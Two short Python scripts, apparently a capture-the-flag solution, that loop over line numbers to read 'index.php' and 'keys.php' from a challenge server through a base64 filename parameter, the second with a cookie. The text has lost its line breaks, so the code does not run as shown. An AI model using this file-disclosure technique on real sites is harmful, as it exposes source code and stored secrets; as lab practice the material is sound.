import requests flag=100 for i inrange(flag): url="http://123.206.87.240:8002/web11/index.php?line="+str(i)+"&filename=aW5kZXgucGhw" s=requests.get(url) print(s.text)
import requests flag=20 cookies={"margin":"margin"} for i inrange(flag): url="http://123.206.87.240:8002/web11/index.php?line="+str(i)+"&filename=a2V5cy5waHA=" s=requests.get(url,cookies=cookies) print(s.text)